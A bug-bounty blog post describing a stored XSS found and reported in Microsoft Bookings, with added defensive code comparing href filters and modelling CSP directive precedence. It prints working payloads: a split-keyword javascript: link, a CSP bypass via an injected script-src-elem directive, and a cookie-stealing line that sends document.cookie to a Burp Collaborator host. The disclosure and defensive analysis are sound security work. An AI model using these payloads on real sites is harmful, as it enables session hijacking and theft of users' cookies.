Stored XSS vulnerability in Microsoft Bookings
This blog post is about my finding in Microsoft 365. One fine day I was working in my office and received a calendar invite from a colleague. While looking at the email I found a service that was new to me (actually old, but new for me): Bookings by Microsoft. Microsoft Bookings allows anyone to book services / calendar slots. The application has two interfaces: an internal one and a public-facing service page. I decided to check this application in depth. I went to the internal booking page, started a new booking, and while booking a service found a message/notes parameter. I tried inserting various XSS payloads to trigger XSS but failed.
On analysis, I found that the application allows the user to insert a link, i.e. an <a href> tag. Now my focus shifted to this tag. I used Google to find the right payload for my attack vector and found that the anchor tag can be exploited through its href value. The application has various protection mechanisms to prevent script execution, but when I broke the word javascript into javas cript the application accepted the payload. Now when a user clicks the link in the booking message, the payload executes. I was very excited.
<a href="javas cript:alert('document.domain')">XSS</a>
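As an added example (not code from the post, from Microsoft Bookings or from the author), here is the class of check that a split scheme keyword slips past, beside a hardened check that looks at the scheme the URL parser actually produces. It assumes the separator in "javas cript" is a character the WHATWG URL parser removes, such as a tab or newline; a literal space is not removed and parses as a relative path instead. The page base, the probe strings and the allowed-scheme set are assumptions made for this example. It runs under Node.js, whose global URL is a WHATWG parser.

```javascript
// Added example (not from the post or from Microsoft Bookings): a keyword
// blocklist for href values versus an allowlist on the parsed scheme.
// Runs under Node.js, whose global URL class is a WHATWG URL parser.

// Naive filter of the kind a split keyword defeats: it looks for the literal
// text "javascript:" and nothing else.
function naiveHrefFilter(href) {
  return !href.toLowerCase().includes("javascript:");
}

// Scheme the URL parser sees for this href, resolved against a hypothetical
// page base. The parser strips leading/trailing control characters and
// spaces, removes every ASCII tab and newline, and lowercases the scheme, so
// "javas\tcript:" and "JaVaScRiPt:" both come out as "javascript:".
// A literal space is kept, so "javas cript:..." parses as a relative path.
function parsedScheme(href, base = "https://example.invalid/page") {
  try {
    return new URL(href, base).protocol;
  } catch {
    return null; // unparsable: treat as unsafe
  }
}

// Hardened filter: allow only an explicit set of schemes after parsing.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);
function safeHref(href) {
  const scheme = parsedScheme(href);
  return scheme !== null && SAFE_SCHEMES.has(scheme);
}

// Constructed probe values (hypothetical, written for this example).
const PROBES = [
  "https://example.com/docs",
  "/relative/path",
  "javascript:alert(1)",
  "javas\tcript:alert(1)",   // tab inside the scheme
  "javas\ncript:alert(1)",   // newline inside the scheme
  " \t javascript:alert(1)", // leading whitespace
  "JaVaScRiPt:alert(1)",
  "javas cript:alert(1)",    // literal space: becomes a relative path
  "data:text/html,<script>alert(1)</script>",
];

// Compare the two filters over the probes; returns one row per probe.
function compareFilters(probes = PROBES) {
  return probes.map((href) => ({
    href,
    scheme: parsedScheme(href),
    naiveAllows: naiveHrefFilter(href),
    safeAllows: safeHref(href),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(compareFilters());
}
```

The table shows the gap: the naive filter lets the tab- and newline-split payloads through while rejecting only the literal spelling, whereas the scheme allowlist rejects every javascript: and data: variant and still accepts ordinary absolute and relative links.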
I was like, wow, that's great, now let's hack it...!!
But when I updated my payload to
<a href="javas cript:alert(document.cookie)">Testing.com</a>
I got a popup with the message "undefined" for the cookies, which means the application has CSP protection.
So I updated the payload to bypass the CSP protection. The injection uses the script-src-elem directive of CSP. This directive targets only script elements (and, in CSP Level 3, javascript: URL navigations), and when it is present it takes precedence over script-src for those checks, so injecting it lets you add 'unsafe-inline' and run inline scripts even though the existing script-src forbids them. A second script-src directive would not do: a repeated directive name is ignored and the first occurrence wins, which is why the injected directive must be one the policy does not already contain. This only works when the application reflects an attacker-controlled parameter into the Content-Security-Policy header, as the report-uri token does in the PortSwigger lab ( https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-bypass ). Thanks to PortSwigger for the lab.
<a href="javas cript:alert(document.cookie)"&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com</a>
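To make the directive-precedence point concrete, here is an added example (not code from the post, from PortSwigger or from Microsoft) that models how a browser chooses the directive governing an inline script element or javascript: URL under CSP Level 3, and evaluates three versions of a header in the shape of the lab. The header layout, the reflected token and the directive fallback chain are assumptions of the example; the reflected value is shown already URL-decoded, as the server would emit it. It runs under Node.js.

```javascript
// Added example (not from the post or from PortSwigger): a minimal model of
// which CSP directive governs an inline script element or javascript: URL,
// used to show why the injected directive must be script-src-elem and not a
// second copy of script-src.

// Parse a Content-Security-Policy header value into name -> source list.
// CSP3: if a directive name repeats, the first occurrence wins and the rest
// are ignored, so a duplicated directive cannot loosen the policy.
function parseCsp(header) {
  const directives = new Map();
  for (const chunk of header.split(";")) {
    const tokens = chunk.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (directives.has(name)) continue;
    directives.set(name, tokens.slice(1));
  }
  return directives;
}

// CSP3 fallback chain for script elements and javascript: navigations:
// script-src-elem, then script-src, then default-src. Returns the name of
// the governing directive, or null if the policy says nothing about scripts.
function governingScriptDirective(directives) {
  for (const name of ["script-src-elem", "script-src", "default-src"]) {
    if (directives.has(name)) return name;
  }
  return null;
}

// Does the policy allow an inline script / javascript: URL? 'unsafe-inline'
// is honoured only when the same source list carries no nonce or hash
// source; with one present the browser ignores 'unsafe-inline'.
function inlineScriptAllowed(header) {
  const directives = parseCsp(header);
  const name = governingScriptDirective(directives);
  if (name === null) return true; // nothing restricts scripts
  const list = directives.get(name).map((s) => s.toLowerCase());
  const hasNonceOrHash = list.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return list.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Constructed header in the shape of the lab: the last directive reflects a
// query parameter (already URL-decoded) that the attacker controls.
function buildReflectedHeader(token) {
  return `default-src 'self'; script-src 'self'; report-uri /csp-report?token=${token}`;
}

// Three reflected values: a benign token, a duplicated script-src (ignored),
// and the appended script-src-elem directive from the post's payload.
function demo() {
  return {
    benign: inlineScriptAllowed(buildReflectedHeader("abc123")),
    duplicateScriptSrc: inlineScriptAllowed(buildReflectedHeader(";script-src 'unsafe-inline'")),
    scriptSrcElem: inlineScriptAllowed(buildReflectedHeader(";script-src-elem 'unsafe-inline'")),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Only the third header allows the inline script: the benign token leaves script-src 'self' in charge, the duplicated script-src is discarded as a repeat, and the appended script-src-elem becomes the governing directive for script elements and javascript: URLs. The nonce/hash rule is the caveat to check in a real target: if the policy already carries a nonce in the list that ends up governing, 'unsafe-inline' in that list is ignored.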
and to my surprise I was able to get the cookies using XSS. Now I wanted to send these cookies to my server, so I started Burp Collaborator and updated the payload to
<a href="javas cript:document.location='http://l4q4dgmomxzkw6i13q5essmojfp6hu6.burpcollaborator.net/cookiestealer.php?c='+document.cookie"&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com</a>
Here I used document.location in the a tag, which redirects the user to another page and sends the cookies along.
Now I wanted to submit this bug, but as I was an authenticated user from the same organization the impact would have been low. So I tried the same attack from the service exposed to the public and was able to perform the same attack without authentication.
Now, as an unauthenticated user/attacker, the severity went from low/medium to high. I quickly submitted this bug to the Microsoft team; the guys at Microsoft were quick to fix this issue and awarded me **** $ for this bug. Thank you, Microsoft security team, for the great help during the patching of this issue.
This is my first bug bounty blog post, so if I have missed something you can ping me on Twitter: https://twitter.com/mrtechghost